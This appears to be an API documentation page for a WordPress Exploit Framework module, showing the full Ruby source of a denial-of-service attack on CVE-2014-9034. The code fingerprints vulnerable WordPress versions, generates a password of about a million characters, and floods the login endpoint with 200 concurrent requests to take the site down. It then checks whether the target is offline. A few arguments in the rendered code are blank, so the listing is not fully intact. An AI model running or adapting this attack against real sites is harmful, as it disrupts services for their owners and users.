Class: Wpxf::Auxiliary::LongPasswordDos

Inherits:
Module
  • Object
show all
Includes:
Wpxf, Net::HttpClient, WordPress::Login, WordPress::User
Defined in:
lib/wpxf/modules/auxiliary/dos/long_password_dos.rb

Constant Summary

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from WordPress::User

#wordpress_user_exists?, #wordpress_user_profile_form_fields

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeLongPasswordDos

Returns a new instance of LongPasswordDos.



9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
 
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 9

def initialize
  super

  update_info(
    name: 'Long Password DoS',
    desc: 'WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, '\
          'and 4.x before 4.0.1 allows remote attackers to cause a denial '\
          'of service via a long password that is improperly handled during '\
          'hashing.',
    author: [
      'Javier Nieto Arevalo',  # Vulnerability disclosure
      'Andres Rojas Guerrero', # Vulnerability disclosure
      'rastating'              # WPXF module
    ],
    references: [
      ['CVE', '2014-9034'],
      ['WPVDB', '7681'],
      ['URL', 'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034']
    ],
    date: 'Nov 20 2014'
  )

  register_options([
    IntegerOption.new(
      name: 'pass_length',
      required: true,
      desc: 'Length of the password to use',
      default: 1_000_000
    ),
    IntegerOption.new(
      name: 'max_requests',
      required: true,
      desc: 'Max number of requests to send',
      default: 200
    ),
    IntegerOption.new(
      name: 'http_client_timeout',
      desc: 'Max wait time in seconds for HTTP responses',
      default: 5,
      required: true
    ),
    StringOption.new(
      name: 'username',
      desc: 'The username to attempt to login with',
      required: true,
      default: ''
    ),
    BooleanOption.new(
      name: 'validate_user',
      desc: 'Validate the specified username',
      required: true,
      default: true
    )
  ])
end

Instance Method Details

#checkObject 



81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
 
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 81

def check
  target_version = wordpress_version
  vuln_ranges = [
    [Gem::Version.new('0'), Gem::Version.new('3.7.5')],
    [Gem::Version.new('3.8'), Gem::Version.new('3.8.5')],
    [Gem::Version.new('3.9'), Gem::Version.new('3.9.3')],
    [Gem::Version.new('4.0'), Gem::Version.new('4.0.1')]
  ]

  return :unknown if target_version.nil?

  vuln_ranges.each do |range|
    if target_version >= range[0] && target_version < range[1]
      return :vulnerable
    end
  end

  :safe
end

#max_requestsObject 



73
74
75
 
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 73

def max_requests
  normalized_option_value('max_requests')
end

#pass_lengthObject 



77
78
79
 
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 77

def pass_length
  normalized_option_value('pass_length')
end

#runObject 



101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
 
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 101

def run
  return false unless super

  if should_validate_user?
    emit_info "Checking if user \"#{username}\" exists..."
    unless wordpress_user_exists?(username)
      emit_error 'The specified user does not exist, aborting operation.'
      return
    end
  end

  emit_info "Generating payload..."
  pass = Wpxf::Utility::Text.rand_alpha(pass_length)
  opts = {
    url: ,
    method: :post,
    body: (username, pass)
  }

  emit_info "Preparing #{max_requests} requests..."
  complete_requests = 0
  max_requests.times do
    queue_request(opts) do |res|
      complete_requests += 1
      emit_warning("#{complete_requests} requests executed") if complete_requests % 10 == 0
    end
  end

  emit_info "Beginning execution of #{max_requests} requests over #{max_http_concurrency} threads"
  execute_queued_requests
  emit_success 'Finished executing requests'

  if wordpress_and_online?
    emit_error "FAILED: #{full_uri} appears to still be online"
    return false
  else
    emit_success "#{full_uri} appears to be down"
    return true
  end
end

#should_validate_user?Boolean

Returns:

  • (Boolean) 


65
66
67
 
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 65

def should_validate_user?
  normalized_option_value('validate_user')
end

#usernameObject 



69
70
71
 
# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 69

def username
  normalized_option_value('username')
end